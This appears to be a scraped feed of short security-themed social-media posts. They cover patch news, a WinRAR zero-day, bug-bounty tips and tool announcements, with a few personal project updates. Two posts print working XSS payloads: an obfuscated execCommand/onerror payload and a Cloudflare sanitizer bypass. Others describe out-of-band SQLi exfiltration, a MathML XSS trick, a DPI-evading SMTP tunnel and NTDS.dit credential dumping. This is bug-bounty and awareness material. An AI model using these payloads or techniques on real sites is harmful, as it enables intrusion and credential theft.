🎇 Website now has 7k active users, up another 3k from 4 days ago! 💥added a link on the desktop for sponsorship opportunities for those who may be interested 💥 also a link to my resume as i am still actively looking for employment Last night I worked on some optimization

Pre-release! Airspace Visualizer is now on GitHub — ADS-B + VDL2 + AI assistant. - LInux (Windows w/minor tweaks) - Real-time aircraft display - Semantic RAG + chat - Geospatial overlays - Built for local data feeds 🔗 github.com/mebrown47/airs… Early, rough, and ready for you

WinRAR Zero-Day Under Active Exploitation – Update to Latest Version Immediately thehackernews.com/2025/08/winrar…

Intent is crucial in every project. That's why my architecture use: Feature structure approach. Traditional code organization focuses on technical patterns: - Command - Queries - Events This creates a significant problem: codebase doesn't reveal what application actually

The only MCP server you'll ever need! MindsDB lets you query data from 200+ sources, like Slack, Gmail, social platforms, and more, in both SQL and natural language. A federated query engine that comes with a built-in MCP server. 100% open-source with 35k+ stars!

Yay, I can tell that MSRC just patched another infrastructure wide ATO bug that I reported against Azure FD a month ago. The main Azure error page now has an updated format to remove the domain name from the error message, thus removing a stored XSS via HTTP/2 & HTTP/1 desync.

In case you missed Black Hat USA 2025? Here are all the slides🫡 🔗github.com/onhexgroup/Con…

OK, some extra... github.com/stamparm/maltr…

I've just added a new PR to impacket to add to secretsdump the "Shadow Snapshot Method via WMI" also for NTDS.dit. This way, NTDS.dit can be downloaded directly from disk without code execution. github.com/fortra/impacke…

Out-of-Band SQLi isn’t your typical injection. Instead of leaking data in HTTP responses, it exfiltrates via DNS/HTTP requests. Tools like Burp Collaborator help detect it. Think xp_dirtree in MSSQL or LOAD_FILE() in MySQL. Silent… but deadly. 💉 #BugBounty

🚨 How #Rhadamanthys Stealer Slips Past Defenses using ClickFix ⚠️ Rhadamanthys is now delivered via ClickFix, combining technical methods and social engineering to bypass automated security solutions, making detection and response especially challenging. 👾 While earlier

Security updates for August 2025 are now available! Details are here: msft.it/6018SZEg0 #PatchTuesday #SecurityUpdateGuide

Another XSS Payload: {document.body.setAttribute('contenteditable',true)}document.execCommand('insert'+'HTML',false,'<img/'+'src/'+'o'+'nerror=a'+'lert('+'/catfather/)>') #bugbountytips #xss

XSS WAF Bypass — Multi-character HTML Entities This technique uses multi-character HTML entities that are recognized by the browser… More details about this technique are shared in our WhatsApp channel. Channel: whatsapp.com/channel/0029Vb… #bugbountytip #BugBounty #XSS #WAF

💥 XSS via MathML? A simple <style><!-- inside MathML triggers a full DOM-based XSS due to parser confusion. 🧠 Not your usual input sanitization failure. 👇 More weird real-world exploits on our WhatsApp channel: whatsapp.com/channel/0029Vb… #XSS #BugBounty

HTML Sanitizer Bypass Cloudflare leads to XSS payload: '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/

Es una herramienta avanzada de análisis de vulnerabilidades web diseñada para ayudar a profesionales de la ciberseguridad y pentesters a detectar, evaluar y mitigar riesgos en aplicaciones web. Su objetivo es fortalecer la seguridad de los sistemas antes de que puedan ser

smtp-tunnel-proxy: A high-speed covert tunnel that disguises TCP traffic as SMTP email communication to bypass Deep Packet Inspection (DPI) firewalls github.com/x011/smtp-tunn…

🚨 One-Click Telegram Flaw Exposes Real IP Addresses Source: cybersecuritynews.com/one-click-tele… A stealthy flaw in Telegram’s mobile clients that lets attackers unmask users’ real IP addresses with a single click, even those hiding behind proxies. Dubbed a “one-click IP leak,” the